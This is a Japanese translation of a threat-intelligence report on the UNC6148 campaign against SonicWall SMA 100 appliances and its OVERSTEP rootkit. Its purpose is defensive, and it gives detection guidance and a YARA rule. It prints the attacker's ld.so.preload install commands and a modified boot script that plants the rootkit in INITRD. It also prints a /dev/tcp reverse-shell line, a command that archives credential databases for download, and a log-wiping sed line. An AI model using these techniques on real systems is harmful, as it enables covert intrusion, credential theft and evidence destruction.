OVERSTEP バックドアを使用した SonicWall Secure Mobile Access（SMA）の悪用キャンペーンが継続中

※この投稿は米国時間 2025 年 7 月 17 日に、Google Cloud blog に投稿されたものの抄訳です。

はじめに

Google Threat Intelligence グループ（GTIG）は、UNC6148 として追跡している、金銭目的の脅威アクターであると疑われるグループによる継続的なキャンペーンを確認しました。このキャンペーンは、完全にパッチが適用されたサポート終了の SonicWall Secure Mobile Access（SMA）100 シリーズ アプライアンスを標的としています。GTIG は、以前の侵入で盗まれた認証情報とワンタイム パスワード（OTP）シードを UNC6148 が利用していると高い確信を持って評価しています。これにより、組織がセキュリティ アップデートを適用した後でも、再びアクセスできてしまいます。アクターのマルウェアはログエントリを選択的に削除するように設計されており、フォレンジック調査を妨げるため、初期感染ベクトルの証拠は限られています。しかし、既知の脆弱性を悪用したものである可能性が高いです。

この新たな活動では、アクターは以前は不明だった永続的なバックドア / ユーザーモードのルートキットをデプロイしています。GTIG はこれを OVERSTEP として追跡しています。Mandiant のインシデント対応業務で得られた知見に基づいた分析によると、このマルウェアはアプライアンスの起動プロセスを変更して、永続的なアクセスを維持し、機密性の高い認証情報を盗み、自身のコンポーネントを隠蔽します。GTIG は、UNC6148 が未知のゼロデイ リモートコード実行脆弱性を利用して、標的を絞らずに SonicWall SMA アプライアンスに OVERSTEP をデプロイした可能性があると、中程度の確信度で評価しています。

GTIG は、UNC6148 の活動は少なくとも 2024 年 10 月に遡り、データ窃盗と恐喝活動、そしておそらくランサムウェアのデプロイを可能にすることを目的としている可能性があると、中程度の確信度で評価しています。2025 年 5 月に UNC6148 の標的となった組織は、2025 年 6 月に「World Leaks」データ漏洩サイト（DLS）に投稿されました。また、UNC6148 の活動は、2023 年末から 2024 年初頭にかけて公表された SonicWall の脆弱性利用型不正プログラムと重複しており、この脆弱性利用型不正プログラムは Abyss ブランドのランサムウェア（GTIG が VSOCIETY として追跡）のデプロイに公的に関連付けられています。

以前に盗まれた認証情報を使用して再侵害されるリスクを考慮し、組織はアプライアンスが完全にパッチ適用されている場合でも、この投稿の推奨事項に従って潜在的な侵害を調査し、すべての認証情報をローテーションする必要があります。このブログ投稿では、防御者がこの脅威を軽減できるよう、OVERSTEP ルートキットと UNC6148 キャンペーンに関する技術的な詳細を提供します。

管理者認証情報を取得するための SMA の初期悪用

最近の調査で UNC6148 を初めて観測した際、標的の SMA 100 シリーズ アプライアンスのローカル管理者認証情報をすでに取得しており、その認証情報をどのように取得したかを示すフォレンジック証拠やその他のデータは特定されませんでした。パッチ適用のタイムラインと、2025 年を通じて SonicWall の n-day 攻撃活動に関する公開レポートに基づき、GTIG は、UNC6148 が既知の脆弱性を悪用して、標的の SMA アプライアンスが最新のファームウェア バージョン（10.2.1.15-81sv）に更新される前に管理者認証情報を盗んだと高い確信度で評価しています。ネットワーク トラフィックのメタデータ レコードの分析から、UNC6148 は 2025 年 1 月に SMA アプライアンスからこれらの認証情報を最初に流出させた可能性があることが示唆されています。

SonicWall や複数のセキュリティ企業からの公開レポートでは、UNC6148 が悪用した可能性のあるさまざまな脆弱性が指摘されています。

• CVE-2021-20038: 未認証のリモートコード実行（SonicWall のアドバイザリ、Truesec のレポート、AttackerKB のエントリ）

• これは、コード実行を可能にするメモリ破損の脆弱性です。ただし、Rapid7 の公開されている不正プログラムは最大 200,000 件の HTTP リクエストを行うことができ、実行に 1 時間以上かかる可能性があるため、大規模なキャンペーンではこの脆弱性が利用されない可能性があります。

• Truesec は、2023 年後半に SonicWall SMA を標的として観測された侵入活動の、もっともらしいエントリ ポイントとしてこれを特定しました。

• CVE-2024-38475: Apache HTTP Server の認証されていないパス トラバーサル脆弱性。SMA 100 シリーズに影響（SonicWall のアドバイザリ、Orange CyberDefense/SCRT のブログ投稿）

• 特に SMA 100 シリーズでは、この脆弱性を悪用して、ユーザー アカウントの認証情報、セッション トークン、OTP シード値などの機密情報を保存する 2 つの異なる SQLite データベース（temp.db と persist.db）を不正に抽出できます。

• watchTowr は 2025 年 5 月にブログ投稿を公開し、この脆弱性を別のバグである CVE-2023-44221 と組み合わせて SMA 100 シリーズ アプライアンスを侵害する方法について説明しました。しかし、UNC6148 がこのバグチェーンを使用したことを示唆する証拠は確認されていません。

• CVE-2021-20035: 認証されたリモートコード実行の脆弱性（SonicWall アドバイザリ、ArcticWolf レポート）

• これは、/cgi-bin/sitecustomization POST リクエストのハンドラにおけるコマンド インジェクションの脆弱性です。

• Arctic Wolf と SonicWall は、2025 年 4 月にこの脆弱性が実際に悪用されたことを報告しました。

• CVE-2021-20039: 認証されたリモートコード実行の脆弱性（SonicWall のアドバイザリ、dfir.ch のブログ投稿、AttackerKB のエントリ）

• これは、/cgi-bin/viewcert のリクエスト ハンドラにおけるコマンド インジェクションの脆弱性です。

• dfir.ch は、この脆弱性が SonicWall SMA の悪用に利用され、2024 年 3 月に Abyss ブランドのランサムウェアがデプロイされるに至った侵入について報告しました。この侵入のアーティファクトは、Mandiant の調査で確認されたものと類似しています。

• CVE-2025-32819: 認証されたファイル削除の脆弱性（SonicWall のアドバイザリ、Rapid7 のレポート）

• この脆弱性を利用すると、巧妙に作成された HTTP リクエストを使用して、標的の SonicWall SMA を組み込みの管理者認証情報 password に戻し、攻撃者に管理者アクセス権を付与できます。

UNC6148 は、前述の脆弱性を利用して、またはここで言及されていない別の脆弱性を利用して、いくつかの異なる経路をたどった可能性があります。CVE-2024-38475 は、UNC6148 が再利用できるローカル管理者認証情報と有効なセッション トークンを提供するため、格好の標的となりますが、Mandiant はその脆弱性の悪用を確認できませんでした。前述の認証済みバグを悪用するには、UNC6148 が SMA アプライアンスに対するある程度の認証情報をすでに持っている必要があり、悪用される可能性は低いですが、実際に悪用された状態であるため、言及する価値はあります。また、情報窃取型マルウェアのログや認証情報のマーケットプレイスを通じて認証情報が取得された可能性もありますが、GTIG は、悪用された SMA アプライアンスの認証情報に関連する直接的な認証情報の漏洩を特定できませんでした。

SMA の侵害と OVERSTEP のデプロイ

Mandiant の前述の調査では、2025 年 6 月に UNC6148 が、BitLaunch（BLNWX）VPS（193.149.180.50）から、前述のローカル管理者認証情報を使用して、標的の SMA 100 シリーズ アプライアンスで Secure Sockets Layer 仮想プライベート ネットワーク（SSL VPN）セッションを確立したことが示されました。

SSL VPN セッションが確立されると、攻撃者は標的の SMA アプライアンスでリバースシェルを生成しました。これらのアプライアンスでは、設計上シェル アクセスは不可能です。Mandiant が SonicWall のプロダクト セキュリティ インシデント対応チーム（PSIRT）と共同で調査した結果、UNC6148 がどのようにしてこのリバースシェルを確立したかは特定されませんでした。UNC6148 が不明な脆弱性を悪用して、リバースシェルを確立した可能性があります。

リバースシェルを介して、UNC6148 は、cat、chmod、cp、date、hostname、mkdir、mount、mv、rm などのさまざまな組み込みシステム バイナリを使用して、初期偵察とファイル操作を実行しました。Mandiant はまた、アクターが設定をエクスポートして SMA アプライアンスにインポートしたこと、および UNC6148 が使用する IP アドレス用に新しいネットワーク アクセス制御ポリシー ルールが作成されたことを確認しました。これは、アクターがエクスポートされた設定ファイルをオフラインで変更して、インフラストラクチャの新しいルールを含め、中断のない運用を確保した可能性があることを示唆しています。

この最初のアクティビティの後、攻撃者は OVERSTEP バックドアをデプロイしました。このプロセスでは、一連のコマンドを実行して、バイナリを Base64 から永続的な /cf ディレクトリにファイル名 xxx.elf でデコードし、/usr/lib/libsamba-errors.so.6 に移動して、そのパスを /etc/ld.so.preload に追加することで永続性を確保します。

cd /cf; touch xxx.elf;
openssl enc -base64 -d [REDACTED] >>xxx.elf;
chmod 777 /usr/lib/libsamba-errors.so.6;
touch -c /usr/lib/libsamba-errors.so.6 -r 
echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;
chown root:root /usr/lib/libsamba-errors.so.6;
chmod 777 /usr/lib/libsamba-errors.so.6;
touch -c /usr/lib/libsamba-errors.so.6 -r 
echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;
arp

図 1: アプライアンスで実行された攻撃者のシェルコマンドの選択

次に、UNC6148 は正規の RC ファイル /etc/rc.d/rc.fwboot を変更して、OVERSTEP の永続性を実現しました。この変更により、アプライアンスが再起動されるたびに、OVERSTEP バイナリがアプライアンスの実行中のファイルシステムに読み込まれるようになりました。具体的には、rc.fwboot スクリプトの bootCurrentFirmware 関数が変更され、次の処理を行うコードが含まれるようになりました。

• 現在のファームウェア ディレクトリ内に zzz という名前の一時ディレクトリを作成しました。このディレクトリは、INITRD イメージの展開、変更、再パッケージ化のためのステージング エリアとして機能しました。これは、ランタイム中に重要なシステムファイルを直接上書きすることなく、悪意のあるコンテンツを注入するための準備段階でした。

• 圧縮された初期 RAM ディスク イメージである INITRD.GZ ファイルを解凍しました。解凍されたファイルの名前は INITRD で、実際のルート ファイル システムがマウントされる前に、ブートプロセス中にメモリに読み込まれる最小限のルート ファイル システムが含まれています。このイメージを改ざんすることで、攻撃者はブート シーケンスの早い段階で存在し、実行可能になる悪意のあるファイルを注入できるようになり、検出と削除が困難になります。

• 解凍された INITRD ファイルをループデバイスとして、新しく作成された $fwLoc/zzz ディレクトリにマウントしました。これにより、INITRD ファイルの内容に、通常ファイルシステムのようにアクセスして変更できるようになりました。これは、スクリプトが初期 RAM ディスクの内容を閲覧および変更できるようにするための重要なステップでした。

• libsamba-errors.so.6 ファイルを /cf/ からマウントされた INITRD ディレクトリ /usr/lib/ にコピーしました。

• ファイル libsamba-errors.so.6 のオーナーとグループを root:root に変更しました。これにより、権限が設定され、通常は root が所有する正規のシステム ライブラリを模倣します。

• コピーされた悪意のあるライブラリのファイル権限を 0777（オーナー、グループ、その他に対して読み取り、書き込み、実行）に変更しました。

• タイムスタンプの改ざん手法を採用し、正規のファイル libsamba-errors.so の変更タイムスタンプを悪意のあるファイル libsamba-errors.so.6 にコピーしようとしました。その目的は、悪意のあるファイルを元のシステム インストールの一部であるかのように見せかけ、検出と調査を妨害することでした。

• 悪意のあるファイル /usr/lib/libsamba-errors.so.6 のパスを、INITRD ディレクトリ /etc/ 内にある ld.so.preload ファイルに書き込みました。これにより、動的実行可能ファイルが OVERSTEP 共有オブジェクト ファイルを読み込み、システム プロセスで永続性と特権実行が提供されます。

• 一時的な変更をクリーンアップしました。

• INITRD ファイルへのすべての変更が保存されたことを確認するため、保留中のディスク書き込みをフラッシュしました

• 一時ディレクトリから INITRD ファイルをマウント解除しました

• 変更した INITRD ファイルを再圧縮しました

• 一時ディレクトリを削除しました

• 新しく圧縮された INITRD の名前を、想定されるファイル名と一致するように INITRD.GZ に変更しました。

• 変更された INITRD.GZ ファイルのタイムスタンプを、カーネル イメージ ファイル BZIMAGE のタイムスタンプと一致するように変更しました。これも、検出と調査を妨害するためのタイムスタンプ改ざん操作でした。

• カーネルイメージ BZIMAGE と変更された初期 RAM ディスク INITRD.GZ をメモリに読み込み、新しいカーネルを実行しました。また、LINUX.OPT からカーネルのブート オプションを追加しました。これにより、システムは変更されたファームウェアで起動する準備が整いました。kexec を使用すると、実行中の Linux カーネルが、ハードウェアを完全に再起動することなく別の Linux カーネルを起動できました。

• ソフトリブートを開始して、新しく読み込まれたカーネルを実行しました。

要するに、このコードはシステムの起動プロセスを利用して、永続的なルートキットを注入していました。攻撃者は INITRD ファイルを変更し、ld.so.preload を利用することで、動的実行可能ファイルが起動するたびに悪意のあるコードが読み込まれて実行されるようにしました。これにより、アプライアンスの特権と永続的な制御を確保しました。

function bootCurrentFirmware()
{
	echo "$FUNCNAME: begin" >> $LOGFILE
	fwLoc=/cf/firmware/current
   
	if [ ! -f $fwLoc/BZIMAGE ]; then
        	echo "Can't locate the kernel image" >> $LOGFILE;
	elif [ -f $fwLoc/INITRD ]; then
        	echo "Can't locate the filesystem image" >> $LOGFILE;
	else
    	mkdir $fwLoc/zzz
    	gzip -d $fwLoc/INITRD.GZ
    	mount -o loop $fwLoc/INITRD $fwLoc/zzz
 
    	cp /cf/libsamba-errors.so.6  
$fwLoc/zzz/usr/lib/libsamba-errors.so.6
    	chown root:root $fwLoc/zzz/usr/lib/libsamba-errors.so.6
    	chmod 777 $fwLoc/zzz/usr/lib/libsamba-errors.so.6
    	touch -c $fwLoc/zzz/usr/lib/libsamba-errors.so.6 -r 
$fwLoc/zzz/usr/lib/libsamba-errors.so
    	echo /usr/lib/libsamba-errors.so.6  > $fwLoc/zzz/etc/ld.so.preload
 
    	sync; umount $fwLoc/zzz; sync; gzip $fwLoc/INITRD; rm -rf $fwLoc/zzz
    	mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ; touch -c $fwLoc/INITRD.GZ -r 
$fwLoc/BZIMAGE
 
    	/usr/local/sbin/kexec -l $fwLoc/BZIMAGE --initrd=$fwLoc/INITRD.GZ  
--append="`cat $fwLoc/LINUX.OPT`"
    	/usr/local/sbin/kexec -e;
	fi
 
	echo "$FUNCNAME: end" >> $LOGFILE
}

図 2: OVERSTEP の永続性を確保するために rc.fwboot ファイルで変更された関数

OVERSTEP のデプロイが完了すると、脅威アクターはシステムログを消去し、ファイアウォールを再起動して OVERSTEP の実行をトリガーしました。

OVERSTEP の分析

OVERSTEP は、SonicWall SMA 100 シリーズ アプライアンス向けに設計された C 言語で記述されたバックドアです。確認されたサンプルは、Intel x86 アーキテクチャ用の 32 ビット ELF 共有オブジェクトとしてコンパイルされています。この共有オブジェクトは、/etc/ld.so.preload ファイルを介してプロセスに読み込まれるように設計されています。このようにプリロードされると、悪意のあるライブラリは、その後に起動されるプロセスのアドレス空間にマッピングされます。このプリローディングにより、マルウェアは標準ライブラリ関数（具体的には open、open64、readdir、readdir64、write）をハイジャックできます。これは、これらのシンボルが正規のシステム ライブラリよりも先に悪意のある共有オブジェクトから解決されるようにするためです。このバックドアの主な機能は、リバースシェルを確立し、侵害されたホストからパスワードを抜き取ることです。さらに、このマルウェアは、フックされたファイル システム関連の関数（ open、open64、readdir、readdir64）を利用してユーザーモードのルートキット機能を実装し、ホスト上のコンポーネントを効果的に隠します。コマンド＆コントロール（C2 または C&C）サーバーとの通信は間接的で、悪意のある write API によってインターセプトされたバッファからコマンドを解析することに依存しています。

悪意のある共有オブジェクトへのパスが /etc/ld.so.preloadファイルに追加され、侵害されたアプライアンスにマルウェアが永続的に存在することが効果的に保証されます。/etc/ld.so.preload ファイルに含まれているため、マルウェアの共有オブジェクトは、侵害されたシステムで実行されるすべての新しいプロセスにマッピングされます。マッピングされると、マルウェアは初期化ルーチン、具体的にはエクスポートされた my_init 関数を介して実行されます。この my_init 関数は、/etc/ld.so.preload に FS_IMMUTABLE_FL フラグを設定し、実質的に、このファイルの変更、削除、名前変更、リンクの作成を防止します。このプリロード メカニズムにより、マルウェアは LD_PRELOAD ハイジャックを実行し、標準ライブラリ関数の open、open64、readdir、readdir64、write の独自のバージョンを挿入できます。ハイジャックされた open* API と readdir* API を利用して、ユーザーモードのルートキットを実装し、マルウェアの存在とコンポーネントを隠蔽します。一方、バックドアのコア機能は、フックされた write 関数内に実装されています。ルートキットとバックドアの機能については、以降のセクションで詳しく説明します。

ユーザーモード ルートキット

通常、ファイルパスとアクセスモードを指定する  open API 関数と open64 API 関数はハイジャックされ、マルウェアによって操作されます。マルウェアがこれらの関数を実装する際、リクエストされたファイルパスが /etc/ld.so.preload であるかどうかがチェックされます。一致すると、エラーコードが返され、侵害されたシステム上のプロセスがこの重要なファイルを開くことができなくなります。

ハイジャックされた readdir API 関数と readdir64 API 関数は、ディレクトリ リストから次のアーティファクトを隠すために使用されます。

• /proc エントリ（ bash、sh、ssh 関連）

• libsamba-errors.so.6（この特定のシステムで確認されたマルウェアのファイル名）

• /etc/ld.so.preload

バックドア

バックドアのコマンド実行メカニズムは、ハイジャックされた write API 関数を中心に展開されます。標準の 書き込み API は、I/O ストリーム宛てのデータを含むバッファを受け取ります。この実装では、悪意のある書き込み関数がこのバッファの最初の 1,024 バイトを調べ、コマンド文字列 dobackshell または dopasswords を検索します。どちらかの文字列が検出されると、マルウェアは関連するコマンド パラメータがその直後に続くことを想定します。

• dobackshell

• コマンド bash -i >& /dev/tcp/<ip>/<port> 0>&1 & を使用してリバースシェルを開始します。

• パラメータ: IP アドレスとポート。

• dopasswords

• 図 3 のコマンドを使用して、指定された <filename> で TAR アーカイブを作成し、機密ファイルをバンドルします。特に、TAR アーカイブは、アクセス権が 777 と緩い、ウェブアクセス可能なディレクトリ /usr/src/EasyAccess/www/htdocs に保存されます。これにより、攻撃者はウェブブラウザ経由でアーカイブをダウンロードできます。

• パラメータ: TAR アーカイブのファイル名。

tar czfP /usr/src/EasyAccess/www/htdocs/<filename>.tgz 
/tmp/temp.db /etc/EasyAccess/var/conf/persist.db 
/etc/EasyAccess/var/cert; chmod 777 
/usr/src/EasyAccess/www/htdocs/<filename>.tgz

図 3: dopasswords OVERSTEP コマンドによって実行されるシェルコマンド

コマンドの解析と実行後、マルウェアは影響を受けたログファイルから対応するエントリを削除しようとします。このクリーンアップは、sed コマンド sed -i '/<cmd>/d' /var/log/<log_file> を使用して行われます。<cmd> は dobackshell または dopasswords のいずれかです。対象の <log_file> は、httpd.log、http_request.log、inotify.log のいずれかです。このログのクリーニング プロセスは、マルウェアが UID と GID を 0 に設定して権限を昇格できた場合にのみ開始されます。

コマンドを受信する

このマルウェアは、ウェブ リクエストに埋め込まれたコマンドを受信するように設計されています。たとえば、正規の httpd サーバーが、コマンドとそのパラメータを含む URL（例: https://<compromised_server>/query?q=dobackshell<params>）を受信する可能性があります。サーバーは、このリクエストを httpd.log、http_request.log、inotify.log などのファイルに記録しようとします。この時点で、悪意のある共有オブジェクトが httpd プロセスのアドレス空間にプリロードされているため、write の呼び出しがインターセプトされます。悪意のある write 関数は、ログデータを解析し、認識されたコマンドをディスパッチします。技術的には、どのプロセスからの書き込みオペレーションでもコマンドの配信に使用できますが、攻撃者の観点からは、このウェブサーバーのログベクトルが意図された最も実用的な方法である可能性が高いです。

リスクと侵害後の活動

GTIG の調査では、侵害されたアプライアンスからのビーコン トラフィックが確認されましたが、侵害後の目立ったアクティビティは特定されませんでした。アクターが痕跡を隠すことに成功している主な理由は、httpd.log、http_request.log、inotify.log からログエントリを選択的に削除できる OVERSTEP の機能にあります。このアンチフォレンジック対策と、ディスク上のシェル履歴の欠如が組み合わさることで、アクターの二次的な目標に対する可視性が大幅に低下します。

主なリスクは、機密ファイルを盗む OVERSTEP の機能に由来します。/etc/EasyAccess/var/cert ディレクトリから persist.db データベースと証明書ファイルを抜き出す機能により、攻撃者は認証情報、OTP シード、証明書を取得できます。盗まれたデータの武器化は直接確認されていませんが、永続的なアクセスへの明確な道筋が作られます。

影響を受けた組織は、アプライアンスに保存されているすべてのシークレットをローテーションし、この記事の推奨事項に従う必要があります。

より広範なコンテキストとキャンペーン

このキャンペーンは、GTIG が直接調査したインシデントにとどまりません。UNC6148 による他の SonicWall SMA アプライアンスの標的化を特定しました。これには、少なくとも 2024 年 10 月に遡る可能性のあるスキャン アクティビティが含まれます。Google の調査結果は、他の影響を受けた組織の報告を確認し、その後 CVE-2024-38475 のアドバイザリを更新して OTP シードのローテーションを推奨した SonicWall の調査結果でも裏付けられています。

GTIG は、このキャンペーンに関連する収益化やその他の最終段階の目標を直接確認していませんが、過去のネットワーク テレメトリー データの分析により、2025 年 5 月に SMA 100 シリーズ アプライアンスが関与するトラフィックが明らかになりました。このアプライアンスは、2025 年 6 月に「World Leaks」DLS に掲載された組織と関連付けられていました。ただし、現時点では偶然の重複である可能性を排除することはできません。

さらに、UNC6148 の活動は、Abyss ブランドのランサムウェアのデプロイを伴う Truesec と dfir.ch の過去の分析と注目すべき重複があります。これらの重複は、UNC6148 が同じアクターまたは関連するアクターであることを示唆しており、これらの侵入が最終的にデータ恐喝やランサムウェアのデプロイにつながる可能性があることを示しています。

• Mandiant が確認した OVERSTEP バックドアとデプロイ メカニズムは、2023 年末に Truesec が報告した wafxSummary ツールの直接的な進化形であるようです。

• 2024 年初頭の dfir.ch のブログ投稿では、Truesec が記述した wafxSummary ツールがデプロイされてから Abyss ブランドのランサムウェアがデプロイされるまで、ほぼ 1 年が経過した侵入について説明しています。これは、最近の調査で UNC6148 の最初の活動から OVERSTEP のデプロイまで 6 か月以上の時間差があったことと一致しています。

推奨事項

GTIG は、SMA アプライアンスを使用しているすべての組織に対し、侵害されたかどうかを判断するための分析を実施することを推奨しています。組織は、ルートキットのアンチ フォレンジック機能による妨害を避けるために、フォレンジック分析用のディスク イメージを取得する必要があります。組織は、物理アプライアンスからディスク イメージをキャプチャするために、SonicWall と連携する必要がある場合があります。

ハンティングと検出

防御者は、ディスク イメージと周辺のログソースを分析して、侵害の兆候がないか確認する必要があります。

• ファイルシステムのアーティファクト

• このレポートに記載されているセキュリティ侵害インジケーター（IoC）の有無。

• 永続的な /cf ディレクトリ内または INITRD ファイル内（特に /usr/lib ディレクトリ内）に予期しないバイナリがある。Google の調査では、これらのディレクトリに OVERSTEP が存在することが確認されました。

• ディスク イメージにファイル /etc/ld.so.preload が存在する場合。このファイルは標準の SMA アプライアンスには存在しないはずであり、ルートキットはライブシステムからこのファイルを隠します。

• RC スクリプトへの悪意のある変更。特に /etc/rc.d/rc.fwboot スクリプト。

• INITRD イメージ（/cf/firmware/）内のタイムスタンプが不規則なファイル。

• ログとネットワークの分析

• URL クエリに dobackshell または dopasswords を含むアプライアンスへのウェブ リクエスト。

• 管理者アカウントを使用して外部 IP アドレス（特に BLNWX などの低評価ネットワーク）から VPN セッションが確立されたことを示すアプライアンスのイベントログ。

• アプライアンスから外部 IP アドレスへのアウトバウンド HTTP ネットワーク トラフィック。

• スケジュールされたメンテナンスの時間枠外で発生した、現在の設定のエクスポート、現在の設定のインポート、すべてのログの手動クリアのログエントリ。

• アプライアンスの他のログファイル内の異常なアクティビティや脅威（FLASH.DAT ファイル（current と backup）内を含む）。

• SMA アプライアンスから環境内の他のシステムへの、主に Secure Shell（SSH）を介した水平展開の証拠。

封じ込めと根絶

侵害の証拠が検出された場合は、組織は脅威を封じ込めるための措置を直ちに講じる必要があります。

• 影響を受けたアプライアンスをネットワークから隔離し、悪意のあるアクティビティの拡大を防ぐ。

• フォレンジック調査を完全に行うために、ディスク イメージとテレメトリーを保持する。

• アクターの活動の全容を把握することは困難な場合があるため、GTIG は、完全な範囲特定と根絶を確実にするために、Mandiant インシデント対応を利用して徹底的な調査を行うことを推奨しています。

セキュリティ強化と緩和

差し迫った脅威を軽減し、将来の攻撃に対してアプライアンスを強化するために、組織は次の対策を講じる必要があります。

• アプライアンス上のすべてのローカル ユーザーとディレクトリ ユーザーのパスワードや OTP バインディングなどのすべての認証情報をリセットする。これは、以前の侵害で盗まれたシークレットを無効にするための最も重要なステップです。

• アプライアンスに保存されている秘密鍵を持つ証明書をすべて取り消して再発行する。

セキュリティ侵害インジケーター（IoC）

ホストベースの IoC

ネットワーク ベースの IoC

検出

YARA ルール

rule G_Backdoor_OVERSTEP_1 {
	meta:
		author = "Google Threat Intelligence Group"
		date_created = "2025-06-03"
		date_modified = "2025-06-03"
		rev = 1
	strings:
		$s1 = "dobackshell"
		$s2 = "dopasswords"
		$s3 = "bash -i >& /dev/tcp/%s 0>&1 &"
		$s4 = "tar czfP /usr/src/EasyAccess/www/htdocs/%s.tgz 
/tmp/temp.db /etc/EasyAccess/var/conf/persist.db 
/etc/EasyAccess/var/cert; chmod 777"
		$s5 = "/etc/ld.so.preload"
		$s6 = "libsamba-errors.so.6"
	condition:
		uint32(0) == 0x464c457f and filesize < 2MB and 4 of them
}

• Mandiant、Google Threat Intelligence グループ
• 執筆者: Josh Goddard、Zander Work、Dimiter Andonov